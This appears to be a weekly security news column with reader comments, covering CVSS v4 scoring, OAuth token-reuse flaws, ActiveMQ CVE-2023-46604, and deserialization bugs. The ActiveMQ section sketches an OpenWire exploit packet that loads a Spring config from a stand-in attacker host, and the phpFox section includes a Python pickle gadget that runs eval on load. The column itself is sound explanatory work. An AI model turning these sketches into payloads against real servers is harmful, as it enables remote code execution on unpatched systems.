We’ve talked a few times here about the issues with the CVSS system. We’ve seen CVE farming, where a moderate issue, or even a non-issue, gets assigned a ridiculously high CVSS score. There are times a minor problem in a library is a major problem in certain use cases, and not an issue at all in others. And with some of those issues in mind, let’s take a look at the fourth version of the Common Vulnerability Scoring System.
One of the first tweaks to cover is the de-emphasis of the base score. Version 3.1 did have optional metrics that were intended to temper the base score, but this revision has beefed that idea up with Threat Metrics, Environmental Metrics, and Supplemental Metrics. These are an attempt to measure how likely it is that an exploit will actually be used. The various combinations have been given names. Where CVSS-B is just the base metric, CVSS-BT is the base and threat scores together. CVSS-BE is the mix of base and environmental metrics, and CVSS-BTE is the combination of all three.
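The naming scheme is mechanical enough to sketch in a few lines of code. This is just an illustration of the nomenclature described above, not any part of the official scoring calculator:

```python
def cvss4_nomenclature(threat=False, environmental=False):
    """Return the CVSS v4.0 nomenclature label for the metric groups
    included in a score. The Base group is always present; the Threat
    and Environmental groups are optional refinements layered on top."""
    label = "CVSS-B"
    if threat:
        label += "T"
    if environmental:
        label += "E"
    return label
```

So a base score alone is reported as CVSS-B, while a score that folds in both the threat and environmental context gets the CVSS-BTE label.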
Another new feature is multiple scores for a given vulnerability. A problem in a library is first considered in a worst-case scenario, and the initial base score is published with those caveats made clear. And then for each downstream program that uses that library, a new base score should be calculated to reflect the reality of that case.
The last thing to mention is the extra granularity now baked into the scoring. We have the addition of “Attack Requirements”, which reflects whether the given vulnerability depends on other factors for exploitability. And similarly, the User Interaction metric is now a tri-state, set to none, passive, or active. Though I might have chosen “reasonable” and “bonehead” instead.
So far, industry response seems to be cautiously optimistic. This won’t solve every problem, but it should help. Hopefully we’ll see fewer vulnerabilities with dubious 10.0 scores, and a bit more nuance in how CVSS is reported.
OAuth is Hard
Last week we mentioned an OAuth problem when a particular site had an open redirect. This week we’ll talk about another potential problem — OAuth without access token validation. And for the record, this Salt Security write-up is also an excellent explainer on OAuth.
So first off, OAuth is an authorization scheme. A user clicks a button on a given site to link with the user’s Facebook account. That site will open a Facebook link in a new window, with a redirect value and client ID specified as URL parameters. If it’s a new connection, Facebook spells out what information is being shared with the requesting site. If the user agrees, Facebook redirects that window to the value specified in the first URL, and appends an OAuth token to the new URL. The remote site then makes a new request to Facebook, asking for the user information, specifying the token. Facebook recognizes the token, and returns the requested information.
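As a rough sketch of that dance, here’s what the two URLs might look like. The client ID, redirect URI, and scopes are made-up values for illustration, and the endpoints follow Facebook’s general shape rather than documenting any exact integration:

```python
from urllib.parse import urlencode

# Hypothetical values -- a real integration uses a registered app's
# client ID and an HTTPS redirect URI allow-listed with the provider.
CLIENT_ID = "1234567890"
REDIRECT_URI = "https://example.com/oauth/callback"

def build_authorization_url():
    """Step 1: the site opens the provider's consent dialog in a new
    window, passing its client ID and where to send the user afterwards."""
    params = {
        "client_id": CLIENT_ID,
        "redirect_uri": REDIRECT_URI,
        "response_type": "token",  # token comes back appended to the redirect
        "scope": "public_profile,email",
    }
    return "https://www.facebook.com/dialog/oauth?" + urlencode(params)

def build_userinfo_url(callback_params):
    """Step 2: after consent, the provider redirects back with an access
    token in the URL. The site then presents that token to request the
    agreed-upon user information."""
    token = callback_params["access_token"]
    return "https://graph.facebook.com/me?" + urlencode({"access_token": token})
```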
This scheme was designed for authorization, not authentication. The important difference is that authentication is proving who the user is, while authorization is securely allowing a site access to something. This isn’t to say that OAuth can’t be used for authentication — OpenID Connect is built on OAuth, after all. The point is that extra care has to be taken to make this authorization scheme secure for authentication.
One of the extra steps that must be taken for proper authentication is token validation. In the case of Facebook, that’s a separate API call to verify that this token was generated for the App ID where it is being used. Without that step, there’s nothing to prevent an OAuth token from one service from being reused on another service. The attack here is that if someone uses a Log in with Facebook button on a malicious site, the access token can be re-used on other sites where the user has accounts.
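Facebook exposes this check as the debug_token Graph API endpoint, which reports which app a token was minted for. Here’s a minimal sketch of the validation step, assuming the response body has already been fetched over HTTPS, with a made-up App ID standing in for a real one:

```python
import json

# Hypothetical: the App ID this backend was issued by the provider.
MY_APP_ID = "1234567890"

def token_is_valid_for_us(debug_token_response: str) -> bool:
    """Reject tokens minted for some *other* app. This is the missing
    check behind the token-reuse attack: a token from a malicious site's
    app must not be accepted as proof of identity here."""
    data = json.loads(debug_token_response)["data"]
    return data.get("is_valid", False) and data.get("app_id") == MY_APP_ID
```

Skip this step, and any valid token for the user, harvested anywhere, looks just as good as one issued for your own app.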
That’s not just theoretical, as the Salt researchers found this very problem in the wild at Vidio.com, Bukalapak.com, and Grammarly. The Grammarly flaw was particularly clever, as that site uses OAuth codes instead of tokens. But it turns out an attacker could simply include a token instead, and it worked. These issues have been privately reported and fixed on all three sites.
ActiveMQ Actively Targeted
Apache’s ActiveMQ has a really nasty issue, CVE-2023-46604, and it’s being used in active ransomware attacks already. It scores a CVSS 10, and is probably going to rate a 10 even on the kinder, more nuanced CVSS 4 scale. This is a Remote Code Execution (RCE) flaw that’s trivial to attack, vulnerable with default settings, requires no authentication or privileges, and targets OpenWire, the default transport protocol in ActiveMQ.
It’s another deserialization flaw, in Java this time. An OpenWire packet with the EXCEPTION_RESPONSE type can override the createThrowable method with another class, and set the string parameter to that class. That opens a wide range of possibilities, but the public Proof of Concept calls a Spring configuration class, and passes an HTTP URL pointing to an attacker-controlled XML config file.
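As a loose sketch, and emphatically not a working exploit, here’s roughly the shape of that packet. OpenWire’s real framing and string encoding are heavily simplified here; the point is just that the payload is nothing more than a type byte and two attacker-chosen strings:

```python
import struct

def openwire_string(s: str) -> bytes:
    """Illustrative length-prefixed string encoding; OpenWire's actual
    'tight' encoding has more options than shown here."""
    raw = s.encode("utf-8")
    return b"\x01" + struct.pack(">H", len(raw)) + raw  # not-null marker + length

def exception_response_payload(class_name: str, arg: str) -> bytes:
    """Sketch of the malicious body: an EXCEPTION_RESPONSE command
    carrying an attacker-chosen class name and a single string argument
    in place of a real Throwable. Framing fields are simplified."""
    EXCEPTION_RESPONSE = 31  # the OpenWire data type being abused
    body = bytes([EXCEPTION_RESPONSE]) + openwire_string(class_name) + openwire_string(arg)
    return struct.pack(">I", len(body)) + body  # length-prefixed frame

# The public PoC supplies a Spring context class and a remote XML config:
payload = exception_response_payload(
    "org.springframework.context.support.ClassPathXmlApplicationContext",
    "http://attacker.example/poc.xml",
)
```

That the entire attack fits in a packet this simple is a big part of why the in-the-wild exploitation started so quickly.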
There are still over three thousand of these services accessible over the internet. That’s down from just over seven thousand on October 30th. So that’s progress. If your unpatched machine is among them, just consider it compromised and act accordingly.
Bits and Bytes
For some much-needed good news, the Mozi botnet is dead. An update to this bit of stubborn IoT malware was pushed out methodically, starting in August, deploying to India first, then China. That update was a go dormant command, and it looks like an intentional shuttering of the botnet. It’s unclear if the botnet’s masterminds just decided they were done, or if the $5 wrench decryption method was deployed.
The phpFox web application had a PHP deserialization flaw, where user input wasn’t properly sanitized before being fed into the unserialize() function. This flaw could lead to arbitrary PHP execution, and was fixed in release 4.8.14, after some waffling by the phpFox developers. We’re inclined to give developers a bit of grace on stories like these, so long as the flaw does get fixed in reasonable time. After all, a security report might be a legitimate RCE, and it might just be someone who found the Chrome DevTools for the first time.
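PHP isn’t alone here: Python’s pickle module has the same failure mode, and it makes for a compact illustration of why feeding untrusted input to a deserializer goes so wrong. This sketch uses pickle’s __reduce__ hook as the gadget, with a harmless getpid() call standing in for an attacker’s real payload:

```python
import pickle

class Gadget:
    """In pickle, __reduce__ tells the deserializer how to rebuild an
    object -- which means it can name any callable to run on load."""
    def __init__(self, cmd):
        self.cmd = cmd

    def __reduce__(self):
        # Deserialization will call eval(cmd): attacker-controlled code.
        return (eval, (self.cmd,))

# "User input" that a naive endpoint might feed straight into loads().
# A harmless expression stands in for a real attacker payload here.
malicious_blob = pickle.dumps(Gadget("__import__('os').getpid()"))

# The vulnerable pattern: unpickling untrusted bytes runs the gadget.
result = pickle.loads(malicious_blob)
```

The fix is the same in every language: treat serialized blobs from users as plain data, and parse them with something inert like JSON instead of a native deserializer.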
You may use link shorteners to share documents and pictures, or to track how well an advertisement campaign is going. Scammers and other malicious actors have other ideas, like using link shorteners to make phishing links look more legitimate. But that’s against the Bit.ly terms of service. And so, there’s a shadowy enterprise that apparently makes money selling bulletproof link shortening services to cyber criminals. Because of course there is.
>wrench decryption method
I’m partial to “Lead Pipe Legilimency”, myself. Either way, it’s great to see another botnet invoking __AvadaKedavra(self);, for once.
How long until software developers, contractors/employees, must have professional liability insurance to cover those events where client/consumer losses are directly attributable to a software component designed/developed by said developer? Other design, manufacturing industries and the healthcare system are all about users suing, in many cases, to make a bit of money. Will the mere act of having to carry liability insurance filter out sloppy work?
That would first require laws and courts to find companies liable for buggy code. There have been some efforts in the EU to do this, but the fear is that the law would drastically slow down innovation, and kill small programming shops and open source development.
Don’t worry, the software industry lobbyists will never allow their benefactors to be responsible for the content delivered by their services.
If they did, then google, fb, et al would be responsible for the malware/scammers paying these tech companies to distribute their malware. There is a lot of money being made in the business of benefiting from the proceeds of crime without any liability or legal recourse.